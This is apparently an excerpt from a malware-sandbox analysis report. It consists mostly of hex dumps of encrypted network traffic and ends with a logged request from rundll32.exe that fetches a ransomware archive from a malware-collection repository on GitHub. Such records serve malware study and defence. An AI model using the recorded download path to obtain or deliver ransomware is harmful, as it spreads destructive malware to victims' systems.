                                                                                                                                                2022-09-29 12:48:39 UTC1335INData Raw: 7e 07 d3 91 36 cc 6c 5d e7 86 c4 bb 68 42 cb 46 fd 3d 53 ef 9a 53 c0 07 a2 a2 fb 2d 2a 97 b1 11 17 27 a3 e2 cd e6 8b 85 1d b8 5e 1d 76 5f f8 48 bb 13 ea 13 88 ed e9 39 9b e4 4f 1d 5b 57 77 14 89 a3 33 0d cd 2d 1c a3 b3 8f 4a fb 61 14 c1 c0 39 92 61 fb ba ad 73 31 0e 78 fb 55 f8 ea e5 36 47 f5 37 b6 48 f6 3b 4f 2f 13 bc 87 5e bb f9 a8 84 93 8b 7f aa e9 ba c2 df 48 f0 a1 09 4c f2 2b c0 26 c3 ec ad 2b 27 48 54 35 3e e4 a1 2f 4a f1 e5 3e 63 45 93 59 ee c1 17 10 cf b7 0a 01 bb 2f 3e 40 e2 96 e7 96 1a 65 42 0d b5 43 d2 26 07 82 cd df 4d 59 00 b3 27 c4 5b 05 2d ba 78 12 48 47 84 96 1e 22 12 c6 b7 9a da 78 5f 2a 58 63 aa ab 3e 4c 26 88 77 b3 73 e9 78 ad 2e 31 a3 8d 09 c2 64 6e 25 01 35 42 06 f8 72 fb 72 b0 c2 ea 64 0b a0 18 d6 f5 0e 30 3d a2 29 67 9c d9 e2 58 45
                                                                                                                                                Data Ascii: ~6l]hBF=SS-*'^v_H9O[Ww3-Ja9as1xU6G7H;O/^HL+&+'HT5>/J>cEY/>@eBC&MY'[-xHG"x_*Xc>L&wsx.1dn%5Brrd0=)gXE
                                                                                                                                                2022-09-29 12:48:39 UTC1337INData Raw: ae 9b f4 c8 3e 7a 74 41 7b b8 2e ef b9 95 a5 e1 52 93 e0 18 af 7b b9 ea ba 7b 09 b8 17 56 3d a0 ca 02 f9 9b 23 a6 23 9e 8c 82 2a 51 2d ae fa eb 89 45 7d 46 5a 53 57 b8 c1 6d 3e 2f e7 2c 0f 04 0a 5b 12 53 71 4f 7d 32 3a 8f 94 81 58 12 b4 7e de 48 b5 d8 5e 26 a8 29 8c f2 e7 dd 9e 5c 9b 12 97 03 2f a5 aa ae a6 44 c9 8c 27 5e 3d 44 7f 98 c1 7d b7 eb 24 f4 de 5c bb b7 0e 9a 9b 9b 01 dd 79 93 79 ed 98 38 ee 61 5f aa fe bb 18 d8 3d 45 53 62 54 d1 13 69 5f 7e 2b 69 18 e8 13 16 e4 87 29 83 8f 25 c0 a9 31 16 a8 65 7f 4c 60 16 f1 7e f1 84 12 21 9c eb 16 48 d2 71 8e 2d 24 2e 5b 04 a5 15 05 54 ed 5a 03 e5 b6 e8 b5 fb ab b6 69 c6 44 53 36 d5 c4 68 3c 7c 15 85 3c ef 6d 35 c6 12 10 a5 a8 c2 57 32 ac eb 19 32 2a dd 65 ad ef ab 60 5c 7e a3 75 bb c1 75 12 5b 8a e6 78 62 14
                                                                                                                                                Data Ascii: >ztA{.R{{V=##*Q-E}FZSWm>/,[SqO}2:X~H^&)\/D'^=D}$\yy8a_=ESbTi_~+i)%1eL`~!Hq-$.[TZiDS6h<|<m5W22*e`\~uu[xb
                                                                                                                                                2022-09-29 12:48:39 UTC1338INData Raw: 63 53 b5 5a bd a6 44 ed d9 02 99 fd 6d 6d ab 31 2c 4d bc f8 f9 95 69 f6 43 4b 13 52 40 19 68 1c b0 8c e2 5a 3a f6 88 cc c7 c6 c8 71 72 db 85 65 79 a0 88 1c 80 52 78 5b 2d dd 51 d6 7f 1d 38 2d d3 5b 59 42 3b f4 13 9d 5c 5d 72 ae 9d eb 83 7c 49 15 9f a8 14 1b 11 da 86 cb a4 f9 88 40 ac dc 36 33 46 30 9a 6e a6 77 18 db 85 67 b2 59 0d a1 be 95 ac 10 10 a4 b7 18 9d e1 0a c5 f8 66 34 91 d0 be f5 c7 25 79 26 b6 65 28 29 29 99 e4 46 c4 88 3e ce 9c 57 ff 55 a8 80 fe 7f fd 7c 98 22 2b 0c 6f d1 cc 8f ec 1c 6c fc c5 e7 86 f8 30 94 c8 d2 bd 71 93 63 53 1c 20 5d 85 ed dc 9f 63 68 db 93 bc 04 40 b0 b5 3c 33 54 17 f8 ea 5c 74 6a 62 3b ab a2 30 36 df 5a 6b df 31 b7 c3 7e 60 ae e4 11 7c d3 d6 8b 46 b1 b7 39 f1 8e 30 4f 4f 1d fa 7a e1 0b 66 74 50 05 fe 6c a9 34 e8 2d 6a 5d
                                                                                                                                                Data Ascii: cSZDmm1,MiCKR@hZ:qreyRx[-Q8-[YB;\]r|I@63F0nwgYf4%y&e())F>WU|"+ol0qcS ]ch@<3T\tjb;06Zk1~`|F90OOzftPl4-j]
                                                                                                                                                2022-09-29 12:48:39 UTC1339INData Raw: f5 a8 e8 97 c4 0b fe 16 47 d3 16 f6 3a 4f 3b 1c d2 7e 95 8d 8e 11 45 2a 99 15 52 4a c4 71 73 a9 d6 e3 4e 2b a9 78 b3 c5 19 0f ea da 8c 7e e2 e1 75 2e cb e0 4a 03 90 4e 4a a3 9c be 32 22 b2 b8 14 8d fb 10 64 57 4e ae 9f ad 68 fc 78 f9 ca 1f b6 91 ca 2f 0f 5c a4 0c 9a cf 28 74 c9 b8 bb 29 06 db 9a 57 ae 02 18 e5 2b 4f 1c 67 68 f0 5c ee 75 50 2a ee 4a 88 f8 d1 d1 53 8d 23 83 b5 dd 06 61 05 0c 53 e3 a8 92 b2 87 61 f8 f7 c4 58 44 f9 ab 63 b8 2f 84 4d e1 96 55 0f 91 a9 93 5b 57 24 8b dc 32 55 7c 58 b9 04 7a 1a e7 e3 05 2a c1 4b 10 92 2b 70 49 49 5f 46 d1 49 8e c0 61 47 58 4a f1 10 2a 27 a2 e8 1c 68 f9 72 8d 98 93 a8 78 65 8e c1 d5 3f d1 95 f9 16 a0 50 ba a0 f1 dd 58 fd 1c 2a 0d 08 94 13 2f 00 2e 59 f8 17 f2 b3 d2 6c dd 48 6c 60 0e f7 69 40 4f a8 a3 6a a2 ea 2c
                                                                                                                                                Data Ascii: G:O;~E*RJqsN+x~u.JNJ2"dWNhx/\(t)W+Ogh\uP*JS#aSaXDc/MU[W$2U|Xz*K+pII_FIaGXJ*'hrxe?PX*/.YlHl`i@Oj,
                                                                                                                                                2022-09-29 12:48:39 UTC1341INData Raw: ba 77 e6 2f d6 40 2b 3a c1 10 19 77 c3 68 7f d4 d8 45 87 3c d6 57 f7 ec 4a d5 22 af 4e f8 57 c0 27 85 f5 df 71 1b b8 86 72 f0 d7 e8 69 db 35 76 2f ab ad 22 d7 be 42 85 02 6e 01 ac 30 c4 0b e7 a3 fa ef b1 e9 08 b9 a1 2d 2d 1b e7 18 57 f9 cc 25 5d 9b 96 81 bc 22 13 0a db 67 3d 05 e2 85 0b 4b 29 b6 7d 64 33 99 b2 71 e0 33 ba 56 7a ef 26 80 3c dd b1 b1 d3 cc d8 20 b7 3c 7e 97 e3 c1 ed a9 aa a0 fa d7 7f fc b0 2a 94 79 29 28 fa 3a a7 85 7d 7e f8 3d 2d ee 4e 1a 51 20 c6 22 75 56 77 ef e2 62 e0 05 7f 4c 66 b1 bf eb 6b 33 fe 39 e9 7e e3 eb 62 ce db 96 59 34 96 ac 7e 89 af 4c 57 a4 57 89 bb b0 cb 2a b8 35 e8 1f 37 68 b9 3a 91 80 aa be de f9 e4 67 8a a8 01 7a c4 81 7f cc 63 47 60 d5 20 10 bb ae c6 30 98 bc b1 e6 0e 64 60 62 63 a0 ee 94 f9 97 77 52 da dd 0c 2d 6a 6a
                                                                                                                                                Data Ascii: w/@+:whE<WJ"NW'qri5v/"Bn0--W%]"g=K)}d3q3Vz&< <~*y)(:}~=-NQ "uVwbLfk39~bY4~LWW*57h:gzcG` 0d`bcwR-jj
                                                                                                                                                2022-09-29 12:48:39 UTC1342INData Raw: e6 9c df 45 c9 81 e1 73 37 b0 b9 ee bf 4e 78 de ca cb 4c 4e cc e7 5d 75 ee 15 e9 94 8a 0d 0e 8a 83 83 7e 52 a2 17 35 f7 ff 3d 12 48 9e 38 cb 3c 1c d7 36 54 6a b4 c9 6c 2d c7 77 58 2b 60 ef 2d 09 43 26 d1 2f 6c b3 70 b3 d7 e5 7c 72 40 35 41 62 fd 85 d5 b8 5e ca 49 ff 22 eb cc 42 47 7d 91 08 5b 76 37 2a a7 c5 0d ff 9a a5 10 0c e6 6e e9 e5 b4 80 4c f5 32 cc b1 89 1c e8 72 fa b3 2a 7f 4c fc da 58 ae 76 51 6d a3 09 71 26 ff b2 a6 f4 bc 77 77 92 27 3d c2 64 9b 0d 0e be bc 21 54 6e 9c 7d 0c 93 3f 39 e9 0f 86 9c 08 87 6e b5 33 8a 1c d9 f7 44 1f 16 40 3e 22 fb a1 84 97 d5 c7 fb 11 c7 a7 07 9f ad b4 97 5c 4d bc 58 dc 0b 0c c8 a7 7c 1b d4 aa 61 56 78 81 78 94 e6 84 9d 1a 7a b8 2e fe 9f ab 08 a2 fe f6 2d 53 ee 45 34 40 b7 59 ee c8 f2 6a ae cc cb ad d7 28 70 08 01 77
                                                                                                                                                Data Ascii: Es7NxLN]u~R5=H8<6Tjl-wX+`-C&/lp|r@5Ab^I"BG}[v7*nL2r*LXvQmq&ww'=d!Tn}?9n3D@>"\MX|aVxxz.-SE4@Yj(pw
                                                                                                                                                2022-09-29 12:48:39 UTC1343INData Raw: 3b 7f 40 3b d1 ff 3b 95 d0 c1 af ab fa cb a9 83 a6 ac f8 7f b2 1e a2 b3 72 4e cc fa bb d1 99 3f 90 a2 b2 10 c6 44 3c 53 d0 2a 28 26 f7 e1 65 28 c2 18 9d 41 5e b8 81 6c ac c5 83 15 09 00 62 bf e8 b5 03 57 75 05 ac ed d3 db 48 4e 7a 1f d8 11 73 e7 8f 72 19 8c 50 7a 52 27 d2 af d8 64 fe 67 9b cc c2 9e f4 a8 bd 13 41 7e ab 73 ff ed e1 af b7 eb 1d a9 31 43 ee ad c4 bc ab 2d 49 27 ee 80 3d c4 b7 45 dc c8 bf 8f 4c dc 86 50 ee fd 5f 65 9e 77 09 b5 d2 3a 22 39 f9 7f 26 6a a2 52 a6 39 0f 78 e3 64 69 9c 5e 4d 2a e5 23 cd 88 ff 51 43 e7 4d c4 a7 81 c1 66 f8 6c a4 a2 0d be 5d 59 a9 d9 c4 8d 5c 45 0f 40 3f 72 f7 66 8d ef f4 56 61 8d 29 4b db 3c b8 25 01 d8 54 c4 89 80 f8 da 4d cc fb c2 31 4d fe 33 bd ae bf 2b ff 99 45 8e b3 2a be b8 9f b7 63 c1 c2 50 72 fb 58 e8 24 e3
                                                                                                                                                Data Ascii: ;@;;rN?D<S*(&e(A^lbWuHNzsrPzR'dgA~s1C-I'=ELP_ew:"9&jR9xdi^M*#QCMfl]Y\E@?rfVa)K<%TM1M3+E*cPrX$
                                                                                                                                                2022-09-29 12:48:39 UTC1345INData Raw: 28 9b 60 1e 71 b8 90 ee e6 49 14 f3 4c 4a 84 4d 24 40 91 9b 4a c8 8a 32 04 2c 23 f2 a5 55 2c 3a aa 65 3e 2d d2 4e f9 de 40 b9 c2 98 2e f2 35 b1 e7 f9 fb b1 12 b3 ca b8 75 3e ab 61 b9 8b 73 9b 1a e0 57 f4 39 39 ba 5f 35 80 61 23 90 86 0e c4 2e e8 12 7d 89 5b ac 2e 27 0e 1c 33 76 67 be 99 31 ce 75 23 0d 55 eb 67 aa 91 2f bd 76 13 97 92 61 58 52 20 42 05 c4 20 2b 18 ec 4a 9f ba 42 70 93 9e 72 9e 75 7b 42 09 0e 09 50 fc 92 5e 95 05 f2 b3 f3 ec 94 7a 2d ea c1 05 07 99 d2 7c c2 0f 06 96 5b 48 13 e9 92 f4 8b 89 b3 9a 7c 26 a5 27 06 78 2a f2 a9 b7 02 18 2a f9 af 29 b4 42 be bf d9 b4 1f da da 22 2f 0e 7c 10 b4 76 fd c5 74 94 ac 39 04 9e ff 9a f5 c7 b1 9c 5c 97 34 92 b7 75 07 72 ec 1a 1f 1e 82 b2 e3 30 96 47 ba 11 ce e0 07 01 6e bb be 65 f2 7f fd b5 c3 d5 23 ce 8d
                                                                                                                                                Data Ascii: (`qILJM$@J2,#U,:e>-N@.5u>asW99_5a#.}[.'3vg1u#Ug/vaXR B +JBpru{BP^z-|[H|&'x**)B"/|vt9\4ur0Gne#
                                                                                                                                                2022-09-29 12:48:39 UTC1346INData Raw: c7 11 83 83 4a d7 2f 05 22 24 93 49 ef 67 7e 71 b7 11 82 b1 65 d9 e8 5c b9 f1 a0 5c b0 d2 9d e8 f0 a0 a3 b6 47 b0 39 68 91 ca f0 09 55 d8 bc 30 8d d3 99 af b8 86 0b 29 c8 e1 7b 72 4f 12 a5 23 32 65 ac 6c 52 67 9f ee 69 11 f6 57 a0 fd 2e 11 5d 91 cb ce 0f ba 60 65 4d ca 8b 93 b3 9b a1 9c 73 0b 1a 59 aa 66 c8 3b 43 6d bf 99 c4 e3 2a 1d 23 bd e5 85 de 96 b9 59 ba 21 74 09 22 2f 61 7d 8a b8 ea 4d 9c ac 15 5d 2d a3 85 61 b9 87 f4 16 54 88 93 e7 4e 9b 79 fb 79 25 9b 51 7d 00 e9 15 90 4d 90 a8 0b b5 28 43 05 34 1a ad 6e 2c f3 e3 ad 4a 76 1e e7 ec f4 2f 4d 6d 77 dc e1 03 19 ef 7a 47 9b a0 2d f3 64 a0 b0 71 6e f4 dc 97 80 f8 48 90 0b 07 7f dd 86 97 d4 a3 fa d4 0c 10 ff 9f e9 f6 48 1a 47 d0 7b 51 6a 30 53 3f 6f 81 8a 9c 0e e8 67 56 16 e8 6b 4f c7 85 35 c0 f3 5b 9c
                                                                                                                                                Data Ascii: J/"$Ig~qe\\G9hU0){rO#2elRgiW.]`eMsYf;Cm*#Y!t"/a}M]-aTNyy%Q}M(C4n,Jv/MmwzG-dqnHHG{Qj0S?ogVkO5[
                                                                                                                                                2022-09-29 12:48:39 UTC1347INData Raw: 77 8f 84 bc 58 35 a6 bb 88 b1 f0 db af e7 13 aa 31 8b cb bc 9f d7 06 04 7f 3c 6c 70 95 f0 80 fc 2d 7f 89 b3 52 fd df 59 3f c7 32 f4 8b ab 20 1a 82 83 29 d6 3e 64 7e 5a 61 f2 2d 31 66 e1 c6 20 8d 20 1c 4d f1 79 7c af 83 cf ac 52 d2 3d 4c 88 0f 06 e1 5a 9d b4 25 83 d2 d4 b5 72 e3 8a f7 63 88 67 a2 98 9e c5 0a bd 7c e1 5c 79 7a 55 f2 c1 12 89 08 68 14 41 9d 2e f6 27 ce fb 04 c3 9f b5 91 46 95 d8 e2 d7 24 de b9 f1 06 c0 e7 1a 49 35 66 05 90 4b ea b0 ad a9 c7 c9 2d fc d9 4e 92 83 37 94 92 46 9e 0f 46 33 6b c9 c9 1f b2 b6 0d 8c ba 5c 42 30 84 72 d2 91 ec 9b d8 bd 5d 9c 89 db fd 83 a9 60 44 a5 86 2d d9 cd b1 3b e4 71 5f 33 ce a8 8d be a3 37 3d f0 6f 4c 72 49 a4 1b 10 56 a3 3b ac ff cb b2 9a 8c 60 8d 51 20 05 9d 2e 29 46 f1 b8 8f 41 1c 11 59 85 8b 74 20 97 0f 1a
                                                                                                                                                Data Ascii: wX51<lp-RY?2 )>d~Za-1f My|R=LZ%rcg|\yzUhA.'F$I5fK-N7FF3k\B0r]`D-;q_37=oLrIV;`Q .)FAYt
                                                                                                                                                2022-09-29 12:48:39 UTC1349INData Raw: 9c 6d f9 e7 6a 05 78 60 43 3a ae 4f c8 bd d4 99 fd 43 25 bb 0c 43 ce 48 67 45 23 bd 54 ed 8b 01 b0 2b 2d 16 56 55 a5 bb 5b 09 1b ca 3c 84 d9 3a af 4d ae 6c 80 a4 53 18 ea fc 3e fe 7c 59 a4 1d 5f 33 aa 13 67 82 b4 b9 b1 bf 28 19 71 1b 8a 00 16 19 1f b2 20 fa 2c 6a 68 77 e5 96 dc fc 38 76 0e 91 72 c6 fb 40 5c ef 1a ed 71 42 1d e2 23 47 17 13 35 36 ae 59 9b 79 56 b7 64 84 0b 27 53 d4 7c d7 4c bc 92 89 2a bb b4 4b 8b c1 0a 37 4b 06 50 05 1e 8c 9a 41 c7 95 50 4d 16 62 5b 53 d7 d4 c5 61 b3 03 ee 8e 90 d9 81 ff b1 b9 48 86 43 a5 6a 5e ee 47 da a4 b9 6f df d5 8c 61 3d 0a a2 8f 95 c4 5b 58 e4 02 2b 8f ec 45 01 7c d1 99 5a 40 5f 85 5d 4f 3d 31 39 62 0b dc 6f 1b 2b d6 75 c0 c1 b1 ac 30 cc af f7 8a ca 2d 87 70 d0 22 83 21 b6 55 85 86 09 f2 91 bf 93 05 7f 7d f2 ac 4b
                                                                                                                                                Data Ascii: mjx`C:OC%CHgE#T+-VU[<:MlS>|Y_3g(q ,jhw8vr@\qB#G56YyVd'S|L*K7KPAPMb[SaHCj^Goa=[X+E|Z@_]O=19bo+u0-p"!U}K
                                                                                                                                                2022-09-29 12:48:39 UTC1349INData Raw: d4 89 4f 0e 02 30 8e 80 58 34 85 06 20 67 88 7a 4a 60 ca 65 1f 4a d8 fc 72 0c 7e 6d 05 1b e6 95 51 87 a3 00 48 ea 75 49 f2 20 59 3b 74 55 08 be e1 b4 90 82 8d d2 6d 2b 50 02 f8 12 c4 5d 62 44 23 be a5 01 03 31 ac 33 53 68 bd 4d e1 66 c1 cc b6 95 16 c5 1f dc 49 61 02 aa e5 aa 82 d4 e6 59 8e c1 cc 54 90 c6 be d7 0a 0c 2f 6a e7 98 31 23 fc 36 83 21 a8 e4 31 ea eb c7 42 47 03 bb 62 db 44 d2 e7 6d 8f 1f 52 fc 20 a8 a0 1d 00 ae 69 03 90 e9 88 d6 f3 52 4f a7 3c f3 22 6f e4 a0 94 1c 08 d4 bb 00 5e d6 2e e5 ab 8e d6 04 d1 24 95 2d 51 49 97 5b 19 3a d7 c0 2f 33 fe 25 23 5c a3 2a bb 20 cb d5 ea 09 ca 48 b0 25 04 c0 18 f7 e6 b5 17 35 9e 40 a9 63 8c 00 cf f5 d5 c0 2b 87 b4 5f 72 4f 0a 62 4c c6 cf 7c 71 bf 5c 88 0d ae 14 25 04 24 7b 55 91 b7 44 67 fc 75 6b 08 d3 4a b6
                                                                                                                                                Data Ascii: O0X4 gzJ`eJr~mQHuI Y;tUm+P]bD#13ShMfIaYT/j1#6!1BGbDmR iRO<"o^.$-QI[:/3%#\* H%5@c+_rObL|q\%${UDgukJ
                                                                                                                                                2022-09-29 12:48:39 UTC1351INData Raw: 45 dd c7 f0 a9 f7 87 06 13 35 ad c2 9b 66 ed 16 a6 ad c9 76 77 ec 46 64 1f 00 4d 8a ca 25 d1 f2 af 47 e2 f1 63 2a 75 ed af 71 73 4d 75 d6 f9 77 7c 22 28 26 44 91 86 9d fd 1b db 54 26 8c d7 22 e5 a6 f9 b6 7c 66 09 0f 76 27 ae fc 3b 6b c2 f0 61 52 54 3a af cf 86 4d 02 b3 69 17 0e 4f 5b 15 2d b6 dd d6 67 75 2d f1 28 f1 b1 fb bd a0 8e 23 8d 5f 1c f0 fa e2 82 a0 db 70 56 7a 3b 54 e5 cf b5 ad b3 eb 37 5e b6 79 b6 a7 e2 19 2a 14 0f 1b 19 14 8b 8c d4 1b 6b 34 6a 67 51 95 50 58 09 ef 5f 36 c7 0b d5 e5 9d 76 f7 5a d2 f7 4a 24 51 d4 0c 0d e7 e5 6b 60 46 65 8a a6 b4 a1 0b 31 a7 2b b3 2d 9d a1 ab 3f c6 75 15 e8 1d 39 b8 07 85 42 c8 5b 8b 78 95 73 d8 9f 8b 86 dc fc 72 28 4d d1 e8 c0 1f ff a7 8e bc 6d 2a 9c 75 47 ef 9f d3 a2 15 5a 4b 91 7a 99 a9 dd 58 f5 ef 3e f9 f5 a4
                                                                                                                                                Data Ascii: E5fvwFdM%Gc*uqsMuw|"(&DT&"|fv';kaRT:MiO[-gu-(#_pVz;T7^y*k4jgQPX_6vZJ$Qk`Fe1+-?u9B[xsr(Mm*uGZKzX>
                                                                                                                                                2022-09-29 12:48:39 UTC1352INData Raw: 91 2c 43 dd be a8 19 69 ac fd 36 14 dd 41 cb de d8 c2 e4 8d 17 03 85 be 1e 44 84 98 f2 b3 06 cb 2e 88 77 34 ca 41 f3 83 c8 4c d0 1b 63 73 00 99 ff 6a fa d4 0d 72 de 4a b2 41 e0 c3 88 c5 2a 48 ce 28 d4 3a 7f 17 38 06 41 e4 0e 23 01 b1 18 43 06 39 b5 8b d2 74 4c 4d 3e da 3a f0 25 65 13 0e 18 ab b9 b0 bc 7f 0f d4 d3 cd 67 65 c6 9e cf 52 40 82 35 37 cf cb 28 dd 28 e2 e0 b1 d9 1f 77 03 c2 76 d0 de 31 ba a6 89 2e 71 cc ce 75 33 3b 80 f3 e8 2c ef 1c e0 d3 db 88 23 e1 b7 99 1d 45 9d 1f 26 f3 3f 6c 95 79 b1 85 85 e2 b7 95 17 7b c5 39 8a aa 48 3b 6b dc bb 8f 23 ac 9d 86 cb 97 2a 40 8f 48 0e 42 c3 82 36 19 7c 4e e3 b2 9f 51 7c 2c bf 18 0a 99 0a 33 99 99 13 84 7e 2b 86 f8 26 42 1b 72 9b 0c b6 d0 6d 29 55 b4 63 16 cf 06 87 75 10 31 2b e5 ba af d1 2e ec c8 ce 8b ab dc
                                                                                                                                                Data Ascii: ,Ci6AD.w4ALcsjrJA*H(:8A#C9tLM>:%egeR@57((wv1.qu3;,#E&?ly{9H;k#*@HB6|NQ|,3~+&Brm)Ucu1+.
                                                                                                                                                2022-09-29 12:48:39 UTC1353INData Raw: 7c f3 4c 99 98 b5 a9 f4 43 30 44 22 4d 41 9a fb 99 7a 03 7e d7 83 68 ed 8d 50 e0 d1 af 66 a8 0a 65 99 44 4c 1b 94 e4 d1 35 71 c0 0c 16 1c 19 33 d9 af be 3a fb 99 ba 96 de ba 1e bd fe d1 b9 1e f3 b5 08 b3 a2 ac 5d 61 06 84 b3 47 5d c8 f3 d9 12 e1 1f 62 f2 7f ee d5 e7 d9 58 e6 63 5e b8 6c ed f0 0f b0 a9 f4 bf 77 c8 54 b1 f9 26 3a 73 01 8c bc 48 87 9c 31 47 b9 1a 3c b8 61 18 bc 13 c9 f6 a6 fb 56 2d 77 4c b8 a0 26 33 65 42 d4 9c c2 57 f6 dc 18 8f 02 d2 89 0b 2f bf 70 db 58 2f 89 8d 10 7c e4 19 9f 66 8b 2c 86 48 77 ab 66 55 db b5 61 7c ba 51 87 10 76 0b b4 82 2a 38 d2 ed 0d 33 1e e6 2f f3 2f 91 28 63 1d 36 68 96 e5 e9 b9 34 83 ba 4a 4b 0e 9b fe c8 11 f6 ca 90 72 fc 99 b7 47 57 5a 02 0a 2d 62 ab de 88 46 be 43 25 92 c7 c9 c0 6b e4 cd 16 1e da 3d a6 66 57 0f 82
                                                                                                                                                Data Ascii: |LC0D"MAz~hPfeDL5q3:]aG]bXc^lwT&:sH1G<aV-wL&3eBW/pX/|f,HwfUa|Qv*83//(c6h4JKrGWZ-bFC%k=fW
                                                                                                                                                2022-09-29 12:48:39 UTC1355INData Raw: 94 42 4b cd 96 a8 d6 09 13 d9 09 1e 0f 37 cd 18 fd 12 66 bb 91 60 de d4 4f 69 62 1d 08 88 33 24 97 9b b1 18 8b 52 4c 8f 20 fd d1 95 cf d4 a3 3f bd 8d ae 2e 24 c5 f8 ab 9c fe 64 d1 88 a4 90 38 94 d6 e5 34 d5 a9 af 25 ab ea 70 72 74 12 2a b5 1e 65 cb a2 79 43 d4 2d 71 5a a2 b6 39 8c 01 29 5e b8 10 79 e1 2a 5e de 87 4c 63 f5 c7 43 f3 ce 4d 57 e2 9b ee 04 3d cb 0c 39 ee cf c9 90 18 f7 7e 4f b2 88 d1 c3 0c fc 14 e3 d4 87 e2 b7 0a f8 c1 a3 5f 3d 42 5e d9 14 4b f9 d5 b3 06 7b 10 42 15 fa ce ce 5c e6 58 8a b6 4a ec 06 b1 86 31 0f 0a d1 e4 60 c5 31 7a 4d d7 5a 27 56 64 90 0d 61 ae 82 a5 46 f7 54 10 d4 a1 32 20 0c 1e 97 75 e6 47 59 ae 66 b4 d3 9e 71 97 51 67 c1 a9 6c e8 0e 2c ea 0f ce f2 2b c2 37 f6 e8 56 6c d4 54 16 88 0b da 8c cc 62 6a 8d 07 4e 7b 2b d1 eb fe bd
                                                                                                                                                Data Ascii: BK7f`Oib3$RL ?.$d84%prt*eyC-qZ9)^y*^LcCMW=9~O_=B^K{B\XJ1`1zMZ'VdaFT2 uGYfqQgl,+7VlTbjN{+
                                                                                                                                                2022-09-29 12:48:39 UTC1356INData Raw: 22 49 30 4f 0c 42 80 b7 f7 19 9d be cc 46 67 7f b2 65 f9 08 7e 0e 18 7d 8d 31 0a 50 d3 2a 7a 72 40 3e a1 84 71 fe 44 6d 96 e0 79 79 49 23 40 1f 12 38 77 7a 90 66 b8 a5 f0 f6 b6 f1 99 8d 40 ce 58 c3 ab 6f 96 d3 4a a8 c2 fa 8e 23 9d e4 6c 1c 96 bd bc f5 8a 42 99 b7 d8 1e 53 64 14 a9 c0 de af 43 b8 0c 30 d1 e8 e7 24 71 f4 85 04 a7 96 2e 34 23 d3 49 ce 85 b6 8b 68 08 3d 0f 58 8d ac 88 7d d1 50 d6 ee d1 39 e7 33 d3 dc 4a 32 7f 44 cb 26 56 09 57 56 49 c6 e6 c7 78 25 5e a1 3d 29 95 05 ce 74 f9 73 23 41 35 a2 c4 e3 ad e1 c6 6b dd 46 b4 89 95 33 9f a9 72 fa 8e d4 41 8e 55 b4 f9 6f 4f 71 c3 c0 97 88 1b 31 2e a1 62 ec ac 7f fc f0 33 06 8e 13 d0 6c 84 92 a1 69 d1 ba 31 2d ff 3c 89 17 19 25 ce a1 c6 1a 70 ed 9d 9b 6d e3 68 cd 49 f0 db 43 15 5f ab 55 9a fb 6b 65 3d 86
                                                                                                                                                Data Ascii: "I0OBFge~}1P*zr@>qDmyyI#@8wzf@XoJ#lBSdC0$q.4#Ih=X}P93J2D&VWVIx%^=)ts#A5kF3rAUoOq1.b3li1-<%pmhIC_Uke=
                                                                                                                                                2022-09-29 12:48:39 UTC1357INData Raw: a5 5b 84 4f b9 5f 7f 21 0b aa 48 14 92 9f ee a9 a2 68 03 bf 5f 63 56 80 84 93 86 87 43 cc 56 2b 83 88 a1 8f f4 8e fb 24 12 8c 0e 29 e1 a6 45 89 ae bc 40 8a a8 12 b0 a1 81 e1 2b c9 7d b9 3a 10 85 d2 c8 50 81 71 e3 41 5a 78 e6 f1 6f 28 ca ce f5 fc 26 91 ae 88 1a a2 91 bb 4b ac 72 f6 f6 1d ea 4d 71 c8 31 91 63 ba 34 db 2d a3 46 d8 b6 5f ac 43 71 ef cb 5b 5d bf a6 5d 15 db a0 98 6b 68 93 c4 15 10 66 fb 40 e1 31 1a ad 53 6a 71 f9 91 64 18 90 db 92 bf 6e 0a f0 b6 a8 55 c3 aa 59 0d f6 0b ce f4 ff 47 21 73 43 df 0a 14 b6 d6 ea cb c4 b3 46 76 59 0c 31 f4 82 e4 70 04 d7 b6 b0 28 de 16 03 2f 47 51 98 35 16 d7 2a ea 83 88 c6 81 f2 ca 8d ff 03 e6 9d dd be f1 3b 5a d7 3f e4 28 7f d3 fd 10 0e de ee ce fc d6 f9 af 35 66 c8 63 ce 34 2d 1e 63 dd 1f 70 22 a1 78 f0 a8 77 e6
                                                                                                                                                Data Ascii: [O_!Hh_cVCV+$)E@+}:PqAZxo(&KrMq1c4-F_Cq[]]khf@1SjqdnUYG!sCFvY1p(/GQ5*;Z?(5fc4-cp"xw
                                                                                                                                                2022-09-29 12:48:39 UTC1359INData Raw: cb 69 06 43 75 c0 71 a4 bd cd eb cd f5 d7 d0 aa 7e 02 b4 bd ff a9 c1 e0 71 bb 06 ec 1a 5e fa 01 7e 5d 9c d5 ee 25 90 c8 0a f8 f7 5c f5 99 34 c0 e3 ba 5a ff 24 0d c6 be b5 4d 36 ec fd a4 c3 6d 94 6e 7c 43 0e 2d 61 a7 70 21 61 80 bc 33 3e 0e a6 14 ee c9 7d 06 d4 be 19 c6 3b 76 a0 3a e5 ed 0b 8e 5a 1c 0d 21 78 be ce b8 e4 85 bd 13 09 05 bf 9b 89 e5 9c c2 2d fd f3 bf 7a 70 10 57 fd 4d d8 48 ce fb 92 10 67 04 1e e8 08 c7 95 a5 5e e5 4b 55 61 f7 1a aa d1 40 e5 ef d5 b8 f0 3d 1b b3 14 7e 86 29 d9 d8 72 5d 09 5e 96 8f e1 c9 21 ed 50 e4 e1 db 86 27 4c b9 54 b5 8b e5 77 9f 12 5b 8d cc 83 4e 6c bf f9 10 a0 10 97 be e3 d9 39 b1 08 31 d8 b6 f7 8c ce f2 24 65 a1 12 5f 03 a7 0d e5 15 ce af 6c b1 ee e3 68 63 e4 58 c7 30 d2 4c 66 0a c8 dc da d0 e8 84 ac f6 cf af 62 77 b6
                                                                                                                                                Data Ascii: iCuq~q^~]%\4Z$M6mn|C-ap!a3>};v:Z!x-zpWMHg^KUa@=~)r]^!P'LTw[Nl91$e_lhcX0Lfbw


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                32192.168.2.349708140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:42 UTC1360OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/NoMoreRansom.zip HTTP/1.1
                                                                                                                                                Host: github.com


                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                33140.82.121.4443192.168.2.349708C:\Users\user\Desktop\1jDe7zWnoe.exe
                                                                                                                                                TimestampkBytes transferredDirectionData
                                                                                                                                                2022-09-29 12:48:42 UTC1360INHTTP/1.1 302 Found
                                                                                                                                                Server: GitHub.com
